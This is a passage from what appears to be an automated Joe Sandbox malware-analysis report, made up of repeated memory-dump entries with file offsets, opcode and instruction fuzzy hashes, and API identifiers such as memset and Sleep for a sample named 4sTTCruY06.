                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s"
                  • API String ID: 0-1553127323
                  • Opcode ID: 9836218f39ca724b273ad881e002db2137144c8ca5b7f869d94ca929fd3efbb6
                  • Instruction ID: 16aadbbc68644320d2ba26523dc74e35077507c394b72f59c52a3549468c8f6a
                  • Opcode Fuzzy Hash: 9836218f39ca724b273ad881e002db2137144c8ca5b7f869d94ca929fd3efbb6
                  • Instruction Fuzzy Hash: 775213A2D283C2C5E7718B29D0447FD27F8EB61748F198275CB88962E4EF797486DB10
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: c
                  • API String ID: 0-112844655
                  • Opcode ID: 02229116bd658d80951c3a9a99ca1a84daf8f817ffb4fbaa2c81afc8e9fc7747
                  • Instruction ID: 7ea6c1a841ec0f8def0cad9a40198cf7afdb6b9b1b6ebd4f3fe6c84f7537851b
                  • Opcode Fuzzy Hash: 02229116bd658d80951c3a9a99ca1a84daf8f817ffb4fbaa2c81afc8e9fc7747
                  • Instruction Fuzzy Hash: BB12C132E0CB8586E725DB36D5401B9B7A0FF99348F146371EA8C636A5EF38E549CB40
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 22ac441a1cb9fff21da14ed93ac3b3d9369d6eada439015b470405929503d1a8
                  • Instruction ID: 5a2abb56c6986659fe3e266bf6399b24d99d87ab2b69e3d3586af4af895cb27d
                  • Opcode Fuzzy Hash: 22ac441a1cb9fff21da14ed93ac3b3d9369d6eada439015b470405929503d1a8
                  • Instruction Fuzzy Hash: 466107A3A1C1E242D3664B2CA55127D6EE0F78A384F1CA3B4FACEC6B85DD3CD5098740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: e56bc5e0870cf9c2c9b7090139414b253ba71cf72561794238e59cf830246f75
                  • Instruction ID: 3a6873ba5b2fc7ec4e650aef6529817dd49ad05c53c389b768cfc43cd1c3699f
                  • Opcode Fuzzy Hash: e56bc5e0870cf9c2c9b7090139414b253ba71cf72561794238e59cf830246f75
                  • Instruction Fuzzy Hash: B561C173B1C6E186D7258B38E405A79BE94F79A788F4993B5DACCC2A45EE2ED005C700
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75d56cbef0ee742cb5ea1e22243022b532497df5c148dd93e1a784245e58ef5f
                  • Instruction ID: 2c9d1c3c581f93af3613d6f045410100946118fd9dd85a0de9ddb99195974780
                  • Opcode Fuzzy Hash: 75d56cbef0ee742cb5ea1e22243022b532497df5c148dd93e1a784245e58ef5f
                  • Instruction Fuzzy Hash: 2D223432E0C2C686E7729A3AC0012B96695EFC57C4F1897B1DE8D976D5FF7C68898301
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a0b4413bd69574e5421cfc2f10481860617d36b465ef62f470367d0e7df288fb
                  • Instruction ID: 727820273cf2ddf2c150eb76011fce8bfe14faa5c756c9dae0c87e2a9c7da065
                  • Opcode Fuzzy Hash: a0b4413bd69574e5421cfc2f10481860617d36b465ef62f470367d0e7df288fb
                  • Instruction Fuzzy Hash: 1E023982E186AAC5F732863145023F963A5CF6A344F1C97B2EDD8725D5FF2C78939260
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 89108fe028941a727a34f4b20f9d9f921c46dd11ab53017d91f832da806bad6a
                  • Instruction ID: 261bb162b0f5f6f2dc6e74587de186b3a00db6195c266892bfeb4aa81020b05c
                  • Opcode Fuzzy Hash: 89108fe028941a727a34f4b20f9d9f921c46dd11ab53017d91f832da806bad6a
                  • Instruction Fuzzy Hash: F0026A92E186A6C5F7328B3141023FD63A9CF5A344F1857B2DDD9B65C5FF2C6883A260
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a83ec3caa102d43c8b81d7a5a7f6e8d987d0c28a9999163b53977baf43db37fb
                  • Instruction ID: 4a83716cd8e6cb5e8822c263bcf20e7f8695ca5428cb6b4bda8b9f984b2a9ea6
                  • Opcode Fuzzy Hash: a83ec3caa102d43c8b81d7a5a7f6e8d987d0c28a9999163b53977baf43db37fb
                  • Instruction Fuzzy Hash: 3012C9738096D5CBD2A3CB2741012FCBBE8DB66740F0983B6D685533A2EB742665E712
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7787bc6097c5dce51bd277d8a7d6544313e956f436ef6f69793586665f8b5725
                  • Instruction ID: d81a5b4ed6ffa064cd6da08471e923c7968e933936c6bd6bb6eb1d577d194d50
                  • Opcode Fuzzy Hash: 7787bc6097c5dce51bd277d8a7d6544313e956f436ef6f69793586665f8b5725
                  • Instruction Fuzzy Hash: 8AF1DB23D18B8D85E222963744420F9B264EFBF385F1DE772FE84B16B2EF3561966500
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f75254fc0e6fcf6cd86b54cf61ae2a455ff0a34fc3fee8d9c6a5d30b2084834e
                  • Instruction ID: 08e1800e64cc4cd5002ec17c0d21ab571a550f5e742cd16766ecbb1c4d63b23e
                  • Opcode Fuzzy Hash: f75254fc0e6fcf6cd86b54cf61ae2a455ff0a34fc3fee8d9c6a5d30b2084834e
                  • Instruction Fuzzy Hash: 9EF1D722D19BCD85E223963794422B9B750EFAE3C4F1CE722FD9872565EF68B1C58700
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 458a1e45f6dbd4399965bb0196548fcb0f5d4cf9f5d7e68ca9faf478eefec148
                  • Instruction ID: 4061483c2103adeee3bd86353d132a533cbcd6026a6693a3187a0837b192efe2
                  • Opcode Fuzzy Hash: 458a1e45f6dbd4399965bb0196548fcb0f5d4cf9f5d7e68ca9faf478eefec148
                  • Instruction Fuzzy Hash: 5BC1D7D299D6D1D4EB728E3541122B926FCDF01788F184AB5EDCD8A1C5EF2DAD42A230
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memcmpmemmove
                  • String ID:
                  • API String ID: 1261870273-0
                  • Opcode ID: 5a6ef48f327f7d7625e5fb49c84cfef995a8813d9a9e0eeb3f1403aa3df09d7a
                  • Instruction ID: 07d6b0efac32e75b50450b43ff206238c44cc982e68823cbaeeb66388fe09db1
                  • Opcode Fuzzy Hash: 5a6ef48f327f7d7625e5fb49c84cfef995a8813d9a9e0eeb3f1403aa3df09d7a
                  • Instruction Fuzzy Hash: 7EE1A4729087C586E761CB26D0413E9B760FF99788F14A376DBC9536A5EF39E089CB00
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e90f4021dee514a5be9b9e43b83f501943647ca4d9f866977cad0b68345d4fb7
                  • Instruction ID: f4912cba896fb3ffb597daea70b891335440d897b1ed75090f567c7775c22896
                  • Opcode Fuzzy Hash: e90f4021dee514a5be9b9e43b83f501943647ca4d9f866977cad0b68345d4fb7
                  • Instruction Fuzzy Hash: FCC1F722D1C68ED1F272523B40424F8A2A4DF7E385F199B72FD9CB25A1EF3975C66600
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4af27b85f7c30ed204885956fc0cd3fc870e04f53adb44cae2797de13ad85b5
                  • Instruction ID: e350c8e81ee8fa6a3c11031c44e68aa109784a88a6fa62b6daa6b2daca94c939
                  • Opcode Fuzzy Hash: d4af27b85f7c30ed204885956fc0cd3fc870e04f53adb44cae2797de13ad85b5
                  • Instruction Fuzzy Hash: 72E1B672A09B419AE710CF55E88039EB7B8FB84358F501276EACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 568432672da2b5e3b71522abb947d1038ca6fe54e53f96fdf144140440857443
                  • Instruction ID: f4ff146e0e34db29ba440d311e8deef872e7148da7e28bdecaa0be3a2cd43d60
                  • Opcode Fuzzy Hash: 568432672da2b5e3b71522abb947d1038ca6fe54e53f96fdf144140440857443
                  • Instruction Fuzzy Hash: DCD10732D48386CAE376CB3A80443F976B8EF05798F198775F798921D5EF3925869B00
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: d603e8560dd539b0674b2c27fa507bcc0bcac951e9502cf2d9abece34ff9ef1a
                  • Instruction ID: 6538f90db0503cb6f9ec8243ad3818a31ba0bc9209492f0ada1bf26a8dc1d6ef
                  • Opcode Fuzzy Hash: d603e8560dd539b0674b2c27fa507bcc0bcac951e9502cf2d9abece34ff9ef1a
                  • Instruction Fuzzy Hash: 01D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: 60f2721d05200247fd25671ff5ea3d876fb5463af271928a62ef400d67ea17ff
                  • Instruction ID: ac584ff1449c29b4bc0b676e8a2974847deef9a8477d575be69690637cd727f3
                  • Opcode Fuzzy Hash: 60f2721d05200247fd25671ff5ea3d876fb5463af271928a62ef400d67ea17ff
                  • Instruction Fuzzy Hash: 00D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: 47ef7138cfe2c6e482ebbbabfc3e9d2c87969d3b008b92bfe8c3789ac3077a17
                  • Instruction ID: aa44aed13a118e2944cbcf4261dc3e89b57c1a6e278ad206d45645e41a8ff4db
                  • Opcode Fuzzy Hash: 47ef7138cfe2c6e482ebbbabfc3e9d2c87969d3b008b92bfe8c3789ac3077a17
                  • Instruction Fuzzy Hash: 61D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: 08f12f895f1a86b423fb7f6b9adf37630ca4a3607632c4ed8bc69a08357a92b4
                  • Instruction ID: 3773a5aeb0eba2e1f75802519a55c81e4567016af8a5525bace59eb83dfd67df
                  • Opcode Fuzzy Hash: 08f12f895f1a86b423fb7f6b9adf37630ca4a3607632c4ed8bc69a08357a92b4
                  • Instruction Fuzzy Hash: 38D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: 5a911eeea5698123807b09c17864601424d26220484e379dfdcec5013934b7cf
                  • Instruction ID: c878242639a62d9d675c0ae7d1365f5c35a8f4a3fcaf830f7810853d71bcbb73
                  • Opcode Fuzzy Hash: 5a911eeea5698123807b09c17864601424d26220484e379dfdcec5013934b7cf
                  • Instruction Fuzzy Hash: E3D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                  • String ID:
                  • API String ID: 1739919806-0
                  • Opcode ID: 7a6b30409e87032ff010e302a9ca90a44832794ce0364282de9db72c075e77c0
                  • Instruction ID: 49bf466f3e10b12451411b42079f1be8bf46f16dfe3831250a59a041c11331de
                  • Opcode Fuzzy Hash: 7a6b30409e87032ff010e302a9ca90a44832794ce0364282de9db72c075e77c0
                  • Instruction Fuzzy Hash: F4D19872A09B419AE7108F55E48079EB7B9FB84348F501276EACC57B68EF78D154CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
